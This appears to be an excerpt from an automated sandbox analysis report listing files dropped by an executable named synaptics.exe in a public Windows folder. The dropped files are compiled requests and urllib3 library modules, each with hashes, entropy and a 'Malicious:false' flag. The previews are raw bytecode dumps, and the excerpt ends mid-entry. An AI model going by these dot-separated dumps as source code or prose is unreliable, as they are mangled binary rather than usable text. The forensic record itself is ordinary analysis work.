                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e...Z.e.j.Z.e.d...d.k.Z.e.d...d.k.Z.d.Z.z.d.d.l.Z.d.Z.W.n...e.y7......d.d.l.Z.Y.n.w.e.rAd.d.l.m.Z...n.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..d.d.l&m'Z'm(Z(m)Z)m*Z*m+Z+..e,Z-e,Z,e.Z.e,e.f.Z/e0e1f.Z2e0f.Z3d.S.).z..requests.compat.~~~~~~~~~~~~~~~..This module previously handled import compatibility issues.between Python 2 and Python 3. It remains for backwards.compatibility until the next major version.......Nc....................C...s<...d.}.d.D.].}.|.d.u.r.z.t...|...}.W.q...t.y.......Y.q.w.q.|.S.).z-Find supported character detection libraries.N)...chardet..charset_normalizer)...importlib..import_module..ImportError).r......lib..r.....?C:\Users\Public\M20EKMMEH2\lib\site-packages\requests\compat.py.._resolve_char_detection....s........................r..............FT)...JSONDecodeError)...OrderedDict)...Callable..Mapping..Mut
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18687
                                                                                                                                                                                                                                  Entropy (8bit):5.258375917169328
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:lEvXhBn08OcOwp5PmoFKcA8YIL0RE9IFHQSAMGHQJCVGjxPA0lcQH:lEvXhBn08HbpZB0AVeiIVByHQs0php
                                                                                                                                                                                                                                  MD5:1D7DE402C32D4ED2214C1AB8D135923A
                                                                                                                                                                                                                                  SHA1:BB0C7E982C7D825851C7FE55B064838FDBE5BCD5
                                                                                                                                                                                                                                  SHA-256:FB3914458951282DBB6C0532500592030BD8FBA7BCF36B77DA09FB3FDD653C79
                                                                                                                                                                                                                                  SHA-512:BCDBEFCBA7B36EC38E9A3A2D6E48CBD8CCBBDDC4DE98CFDB84608D6AF33C6206F9D95627D91134D626B255F882258C84624D3AAE29F889C87F04A64F09ECFC78
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.H.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...z.d.d.l.Z.W.n...e.y5......d.d.l.Z.Y.n.w.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.j.e...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d.d...Z.d.S.)!z..requests.cookies.~~~~~~~~~~~~~~~~..Compatibility code to be able to use `http.cookiejar.CookieJar` with requests...requests.utils imports from here, so be careful with imports.......N.....)...to_native_string)...Morsel..MutableMapping..cookielib..urlparse..urlunparsec....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.S.) ..MockRequesta....Wraps a `requests.Request` to mimic a `urllib2.Request`... The code in `http.cookiejar.CookieJar` expects this interface in order to correctly. manage cookie policies, i.e., determine whether a cookie can be set, given the. domains of th
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6195
                                                                                                                                                                                                                                  Entropy (8bit):4.921639769974512
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:KIrpcxB6P/5IldtEEJiCr6dNtQlrnlGkh98RZR1YgvOHwXx:frp5xIlv/JPr6OgH2Qh
                                                                                                                                                                                                                                  MD5:118E7782AF7E1A08F7DB6705EF0494FA
                                                                                                                                                                                                                                  SHA1:770FDE336AED9A3E4E0888E96D06F41D69BEEC77
                                                                                                                                                                                                                                  SHA-256:89A7031FFDE9E6E6DD478BFA269C775D877395F1EC0BCEF527AEA08B77B5FB3E
                                                                                                                                                                                                                                  SHA-512:198193DFAB7167D984B350F56C0A83052EDA804F8FCD8CB363B1F0CAD621BD0C157ED4E3F76D8382922F6B27BD945394F6BCF066E16CC5CA503F8E1356CEA515
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.G.d#d$..d$e.e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e.e ..Z!G.d5d6..d6e...Z"d7S.)8z`.requests.exceptions.~~~~~~~~~~~~~~~~~~~..This module contains the set of Requests' exceptions.......)...HTTPError.....)...JSONDecodeErrorc........................s ...e.Z.d.Z.d.Z...f.d.d...Z.....Z.S.)...RequestExceptionzTThere was an ambiguous exception that occurred while handling your. request.. c........................sX...|...d.d...}.|.|._.|...d.d...|._.|.d.u.r!|.j.s!t.|.d...r!|.j.j.|._.t...j.|.i.|.......d.S.).zBInitialize RequestException with `request` and `response` objects...resp
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):960
                                                                                                                                                                                                                                  Entropy (8bit):5.234174825210461
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:tgSx1qlJ5pMUqTDP/+/kv1mY+qnvWZ3b1e7N:tuRyDPGwcYxS3bUx
                                                                                                                                                                                                                                  MD5:052409E9297D4EDED2D1EDDB9365EFF2
                                                                                                                                                                                                                                  SHA1:20FB9478028DBBCFF99DA71B0020F76E59BCA485
                                                                                                                                                                                                                                  SHA-256:6211169A545A5CC8ABF8AC850192C552C1EA305DE4E4A559D39CD4E16F8D9A10
                                                                                                                                                                                                                                  SHA-512:4C4CAC51BDBE0F24E37FB44572BAAAC5726D51510FEE2651F101AB2178D4AE187D57F8AF670F6686795CE48CB7A66A3C7CBC3B6A998B2B77C4DE92E7A8E372CB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...s....d.Z.d.g.Z.d.d...Z.d.d...Z.d.S.).z..requests.hooks.~~~~~~~~~~~~~~..This module provides the capabilities for the Requests hooks system...Available hooks:..``response``:. The response generated from a Request....responsec....................C...s....d.d...t.D...S.).Nc....................S...s....i.|.].}.|.g...q.S...r....)....0..eventr....r.....>C:\Users\Public\M20EKMMEH2\lib\site-packages\requests\hooks.py..<dictcomp>....s......z!default_hooks.<locals>.<dictcomp>)...HOOKSr....r....r....r......default_hooks....s......r....c....................K...sP...|.p.i.}.|...|...}.|.r&t.|.d...r.|.g.}.|.D.].}.|.|.f.i.|.....}.|.d.u.r%|.}.q.|.S.).z6Dispatches a hook dictionary on a given piece of data...__call__N)...get..hasattr)...key..hooksZ.hook_data..kwargs..hookZ._hook_datar....r....r......dispatch_hook....s..........................r....N)...__doc__r....r....r....r....r....r....r......<module>....s............
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24182
                                                                                                                                                                                                                                  Entropy (8bit):5.464222528628289
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+34sgR7uY/Gf9b7UxmzVmwYB984Z2YbwFkeeiZIuWEKbXN7:+3a6Y/GpKmzVmVB9tZ2YbwFeQgEKbXN7
                                                                                                                                                                                                                                  MD5:4B26C42F9D59D6A663601B2E161A1AC4
                                                                                                                                                                                                                                  SHA1:04442482D055BAA76C119287223541672D5FCC65
                                                                                                                                                                                                                                  SHA-256:73409EFEE1A019889F4ED51A7C3667B12CCB271A7C69F881EF67D3B52FF1D918
                                                                                                                                                                                                                                  SHA-512:BCB8FCD5BBAF48E0C623F733432C0A8ADC4EACEC0EB84B95BD76AAEA0B42E2914E17CF215410EB0821509B929AC44FF3A7378D12480CF358FB5FFAEFF604AB15
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..fZ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z ..d.d.l.m!Z!m"Z"m#Z#..d.d.l$m%Z%m&Z&m'Z'..d.d.l(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z...d.d.l(m.Z/..d.d.l(m0Z0..d.d.l(m.Z1..d.d.l(m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<m=Z=m>Z>m?Z?m@Z@mAZAmBZBmCZC..e6jDe6jEe6jFe6jGe6jHf.ZId.ZJd.ZKd.ZLG.d.d...d...ZMG.d.d...d...ZNG.d.d ..d eN..ZOG.d!d"..d"eMeN..ZPG.d#d$..d$..ZQd.S.)%z`.requests.models.~~~~~~~~~~~~~~~..This module contains the primary objects that power Requests.......N)...UnsupportedOperation)...DecodeError..LocationParseError..ProtocolError..ReadTimeoutError..SSLError)...RequestField)...encode_multipart_formdata)...parse_url.....)...to_native_string..unicode_is_ascii)...HTTPBasicAuth)...Callable..JSONDecodeError..Mapping..basestring..builtin_str..chardet..cookielib)...json)...urlencode..urlsplit..urlunparse)..._copy_
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):597
                                                                                                                                                                                                                                  Entropy (8bit):5.475608911357495
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:CAcGzQ2Z1N6EzEq+sH5MWR6hxtRHV/bCJHRi/uelmXifqI0I9IGmu+bRhCUV/X:tdwnq+sHIztRERi/uAfz3pmu+1hCmX
                                                                                                                                                                                                                                  MD5:AAC5E638B6EBCBA678F755CFAAB18E14
                                                                                                                                                                                                                                  SHA1:AE6F12EE4B422FD9994F0BAA0CD800CFB2352D7C
                                                                                                                                                                                                                                  SHA-256:434B541FF1271CE41762DBCCCD091641FBBE2949D1A2880890E9953863F300B4
                                                                                                                                                                                                                                  SHA-512:7FD628A3891CF0B55DD477D0896BC13C2C7A823A7EE026C234BCEF57C8D7EA4F7C252747D1A6857BFD7E7ACF02A30AF3222B4A1E4E0AD0A5DE90F2D0AE2FDA07
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...s....d.d.l.Z.d.d.l.m.Z...d.D.](Z.e.e...e...e.<.e.e.j...D.].Z.e.e.k.s(e...e...d.....r3e.j.e...e.j.d.e.....<.q.q.e.d.u.rke.j.Z.e.e.j...D.]+Z.e.e.k.sOe...e...d.....rje.j.e...Z.e.e.j.d.e.....<.e...e.d...Z.e.e.j.d.e.....<.qAd.S.d.S.)......N.....)...chardet)...urllib3..idna...z.requests.packages.r....)...sys..compatr......package..__import__..locals..list..modules..mod..startswith..__name__..targetZ.imported_mod..replace..r....r.....AC:\Users\Public\M20EKMMEH2\lib\site-packages\requests\packages.py..<module>....s(...........................................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19690
                                                                                                                                                                                                                                  Entropy (8bit):5.466866389317107
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:rKLx6rqoGz2kdHyVf6jLBvYANUwZaBk2bNHn8Qq:OFKGFHRjW2c/n8b
                                                                                                                                                                                                                                  MD5:4596DAF13DDC42B31C0B7F0F05A32FD5
                                                                                                                                                                                                                                  SHA1:AEB24E879139AFFAEFC7271664317DDC2E2CEF54
                                                                                                                                                                                                                                  SHA-256:07940411DC666E608199444AD5ABF4E05E82C310CB2AB8B3EFB7EFA13FB91816
                                                                                                                                                                                                                                  SHA-512:65422FCD860998EB85B725F727A1AECFE521A0491C44DDC550A8046B33C064D620F9897B4BA277CE53E2C903755071B307F4CB033E95F07989C2C878CEA895C9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.w.......................@...sj...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3..e.j4d.k.r.e.j5Z6n.e.j.Z6e.f.d.d...Z7e.f.d.d...Z8G.d.d...d...Z9G.d.d...d.e9..Z:d.d...Z;d.S.).z..requests.sessions.~~~~~~~~~~~~~~~~~..This module provides a Session object to manage and persist settings across.requests (cookies, auth, proxies).......N)...OrderedDict)...timedelta.....)...to_native_string)...HTTPAdapter)..._basic_auth_str)...Mapping..cookielib..urljoin..urlparse)...RequestsCookieJar..cookiejar_from_dict..extract_cookies_to_jar..merge_cookies)...ChunkedEncodingError..ContentDecodingError..InvalidSchema..TooManyRedirects)...default_hooks..dispatch_hook)...DEFAULT_REDIRECT_LIMIT..REDIRECT_STATI..PreparedRequest..Request)...codes)...CaseInsensitiveDict)...DEFAULT_P
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4710
                                                                                                                                                                                                                                  Entropy (8bit):5.73913685517168
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:m+vEE3B8QaXQ/aMZaSUp8DuaiCSu6woOXRAdeM8y2F4K1r7w:mWn3WKfr/piTNg+evFs
                                                                                                                                                                                                                                  MD5:1324D1B1AC6D41615514915BAEC82025
                                                                                                                                                                                                                                  SHA1:2588C007AEC22D9673A81753F1511FDE4BEAFD80
                                                                                                                                                                                                                                  SHA-256:636A2381A0DC083154DE86D2D6EE6B6496119CBB22C12A9BDF1ADF9B45B82BE7
                                                                                                                                                                                                                                  SHA-512:CEC9D9A2DCB67F75AFC45AD747C86ABE417FEBD0CAA448504F1661716EF452C0CA2A3031F0AC1ED3712D52AFAB13E831309E8E8CDF84859932086EF20DF60B04
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...s....d.a.d.d.l.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..i.d%d&..d'd(..d)d*..d+d,..d-d...d/d0..d1d2..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d@..dAdB..dCdD..dEdF....i.dGdH..dIdJ..dKdL..dMdN..dOdP..dQdR..dSdT..dUdV..dWdX..dYdZ..d[d\..d]d^..d_d`..dadb..dcdd..dedf..dgdh....i.didj..dkdl..dmdn..dodp..dqdr..dsdt..dudv..dwdx..dydz..d{d|..d}d~..d.d...d.d...d.d...d.d...d.d...d.d.....Z.e.d.d...Z.d.d...Z.e.....d.S.).a.....The ``codes`` object defines a mapping from common names for HTTP statuses.to their numerical codes, accessible either as attributes or as dictionary.items...Example::.. >>> import requests. >>> requests.codes['temporary_redirect']. 307. >>> requests.codes.teapot. 418. >>> requests.codes['\o/']. 200..Some codes have multiple names, and both upper- and lower-case versions of.the names are allowed. For example, ``codes.ok``, ``codes.OK``, and.``codes.okay
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4404
                                                                                                                                                                                                                                  Entropy (8bit):5.100155341217687
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:2VEvJgabXXYF+hwKMGZG3h+VLTovFx0qjax7evl:2UJrbXX8wtEhL39
                                                                                                                                                                                                                                  MD5:191CE3541373DF4524C5FEB39D8D0EC9
                                                                                                                                                                                                                                  SHA1:2E168C18C89051B03E51ABBA775B35E1F11DD447
                                                                                                                                                                                                                                  SHA-256:76997314CE25BA7359AC0363B59D9D6841C111D19147EDFABE98BAF8965CD834
                                                                                                                                                                                                                                  SHA-512:54491BA1B496E551AAA52D75555A6BF63CE28E2F00425ADBB903EAFA29CC5BE7CAB07558458B962AB635CC5D3B9A3B76F894A3DF8DE4455F4679EFD4AFE85499
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f`........................@...sD...d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).zO.requests.structures.~~~~~~~~~~~~~~~~~~~..Data structures that power Requests.......)...OrderedDict.....)...Mapping..MutableMappingc....................@...sb...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...CaseInsensitiveDicta....A case-insensitive ``dict``-like object... Implements all methods and operations of. ``MutableMapping`` as well as dict's ``copy``. Also. provides ``lower_items``... All keys are expected to be strings. The structure remembers the. case of the last key to be set, and ``iter(instance)``,. ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()``. will contain case-sensitive keys. However, querying and contains. testing is case insensitive::.. cid = CaseInsensitiveDict(). cid['Accept'] = 'application/json'. cid['aCCEPT'] == 'application/json'
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24592
                                                                                                                                                                                                                                  Entropy (8bit):5.589541959365256
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:dwAXYuSd5j1OCC04lbTaUGMAuAWtNNMAMFFOCTGvq2iqkg+p/cdiGjYrUcszdvLk:de/54lPaQxA2usCTGGZcdzTR5vLk
                                                                                                                                                                                                                                  MD5:B6C33FF0107FDEFBA1BB9B39EF843ABE
                                                                                                                                                                                                                                  SHA1:4BA19B8206C5A6ACAB071E5A2045CA3C424DFB53
                                                                                                                                                                                                                                  SHA-256:F75569ED98436F5CA494097148F495E4023455F8002DCC03943FDEBD56DA830A
                                                                                                                                                                                                                                  SHA-512:3A24C8C8872139868336A1E45CF9BAC8E8EE3F5E296E16804875748D42F475D9AA23B8E3D618C0E6DD98FF08DDCBF5530FC7A13CB19B8FB8D9F25D52C91411F6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..fS........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z!..d.d.l.m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-m.Z.m/Z/..d.d.l0m1Z1..d.Z2e..3..Z4d.d.d...Z5d..6e..7d.e.d.d...d.......Z8e.j9d.k.r.d.d...Z:d.d...Z"d.d...Z;d.d ..Z<dtd"d#..Z=d$d%..Z>d&d'..Z?e.j@d(d)....ZAd*d+..ZBd,d-..ZCd.d/..ZDd0d1..ZEdtd2d3..ZFd4d5..ZGd6d7..ZHd8d9..ZId:d;..ZJd<d=..ZKd>d?..ZLd@dA..ZMdBdC..ZNeOdD..ZPdEdF..ZQdGdH..ZRdIdJ..ZSdKdL..ZTdMdN..ZUdOdP..ZVe.j@dQdR....ZWdSdT..ZXdudUdV..ZYdWdX..ZZdvdYdZ..Z[dwd\d]..Z\d^d_..Z]d`da..Z^db._dc..Z`e`dd..Zae`de..Zbdfdg..Zcdhdi..Zddjdk..Zedldm..Zfdndo..Zgdpdq..Zhdrds..Zid.S.)xz..requests.utils.~~~~~~~~~~~~~~..This module provides utility functions that are used within Requests.that are also useful for external consumption.......N)...OrderedDict)...make_headers..parse_url..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6092
                                                                                                                                                                                                                                  Entropy (8bit):5.511514085656575
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:h/KVMbgcD9Q0jnBw/lM2oAHVKR2hSRlcLJCuhvPFor70SSD4BPa/vpy6GzbDZrH:4VIgchjjneTECFCuh8aDiPwQRrH
                                                                                                                                                                                                                                  MD5:C0C5583B2FFAAEE8BD38B4CC466F036A
                                                                                                                                                                                                                                  SHA1:36272C93737D953561C9FCFA34D81288492F364E
                                                                                                                                                                                                                                  SHA-256:066C49B4C53F478B4EB37E531589DCD5C0AB08BEF003323C12A126019E003455
                                                                                                                                                                                                                                  SHA-512:18F83F408EAF115C08E2D7158BF041807C122F7362AAA2BAB213F694D55EFEDDFAF22733A9E87B93EBB411B07FDFC0020915A160B79C2BA830B7778DD22BCBDC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..fC........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..z.d.d.l$Z$W.n...e%y{......Y.n"w.e$j&.'d...s.e..(d.e$j&..d...e.j)....n.e$j*d.k.r.e%d.e$j&..d.......d.Z+d.Z,e.Z.d.Z-e...e/...0e.......e.j1f.dBd.d...Z2[.e.j3d.e.j4d d!....e.j3d"e.j5d d!....e.j6f.dCd&d'..Z7e...Z8d.d.d.d d d d.d(d.d)..dDd>d?..Z9e.j:d@k.r.d.dAl;m<Z<..e<....d.S.d.S.)Eze.Python HTTP library with thread-safe connection pooling, file post support, user friendly, and more......)...annotationsN)...NullHandler.....)...exceptions)..._TYPE_BODY)...HTTPHeaderDict)...__version__)...HTTPConnectionPool..HTTPSConnectionPool..connection_from_url)..._TYPE_FIELDS..encode_multipart_formdata)...PoolManager..ProxyManager..proxy_from_url)...BaseHTTPResponse..HTTPResponse)...make_headers)...Retry)...Timeoutz.OpenSSL zUurllib3 v2 only suppo
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5667
                                                                                                                                                                                                                                  Entropy (8bit):5.12214502092679
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:+c/rl7d/T49ElnxsGaqlYrxg5BLYrrN/jFV/5/iWb01GJwIGdP2vI5PAv/Atd2Nq:7zl7d/89El98SGrpn5/iWb01GJBvI5Px
                                                                                                                                                                                                                                  MD5:8B25A03CC2D06453266A15466C3BDF91
                                                                                                                                                                                                                                  SHA1:BF2456998D810F597A31D758E8216BDDA6FBB37B
                                                                                                                                                                                                                                  SHA-256:E69ACCDAFDFC593AF8F0157DAC27FC164EDFC8A599887A61C02C558F777C900C
                                                                                                                                                                                                                                  SHA-512:CCDCBDDD9005DB71C615620B192BC7137FC0A1362DF368B778B8614585773AB10F45A7D2FFF93B00810949145C043DDE60A5A4BA77E149B5935B80E9B981EED9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.e.e.j.e.j...e.j.e...e.f...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.j.rfd.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.S.d.S.)......)...annotationsN.....)..._TYPE_SOCKET_OPTIONS)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...Urlc....................@...s....e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...ProxyConfig..ssl.SSLContext | None..ssl_context..boolZ.use_forwarding_for_https."None | str | typing.Literal[False]..assert_hostname..str | None..assert_fingerprintN....__name__..__module__..__qualname__..__annotations__..r....r.....HC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\_base_connection.pyr........s..............r....c....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)..._ResponseOptions..strZ.request_methodZ.request_urlr......preload_content..decode_content..enforce_content_lengthNr....r....r....r....r....r........s.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16233
                                                                                                                                                                                                                                  Entropy (8bit):5.258505785289059
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:F1FpjR4qRg8OGlm9VP0Zxfl9Zg2j142c84ll4OERj4T/gW9lYyscf:raf8O4m9VPaxfS2Sl4ORTvNso
                                                                                                                                                                                                                                  MD5:6778498A07ED2FD74DA87F36A446286F
                                                                                                                                                                                                                                  SHA1:292D8FD54CFA4433FB8D14165400C14793BD0792
                                                                                                                                                                                                                                  SHA-256:0B18F81CB9CA24E685BFC3342868F1140EE3019C0D264ABE20497C721A60C00E
                                                                                                                                                                                                                                  SHA-512:39D02E364F923EA26C6BD9AD2B1A3BC0A037175BAE6B1F47602429D8D427B3D20846F4D487C2E4BCDBEF8799F68C6A73CA8F03FF340EC3BFEB495F6A6078E54E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.C.......................@...s:...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.r5d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d.g.Z.e...d...Z.e...d...Z.e...d...Z.e.j.d.e.j.e.e.f...e.j.e.j.e.e.f.....d.f...Z.G.d.d...d.e...Z.d.d.d...Z.G.d.d...d.e.j.e.e.f...e.j.e.e.f.....Z.G.d.d...d.e.j.e.j.e.e.f.......Z G.d.d...d.e.j.e.e.f.....Z!d.S.)......)...annotationsN)...OrderedDict)...Enum..auto)...RLock)...Protocol)...Selfc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...HasGettableStringKeys..return..typing.Iterator[str]c....................C........d.S...N......selfr....r.....DC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\_collections.py..keys...........z.HasGettableStringKeys.keys..key..strc....................C...r....r....r......r....r....r....r....r......__getitem__....r....z!HasGettableStringKeys.__getitem__N..r....r......r....r....r....r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r......Recent
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9076
                                                                                                                                                                                                                                  Entropy (8bit):5.2555826419306895
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:zR6oSXCyBq9B8lhwzOcRtKtABQS0Sr6Ma/:d6oenq9H6cRTBB0Sr6Ma/
                                                                                                                                                                                                                                  MD5:236776F33E40CA7030B5D2C6C41AF51B
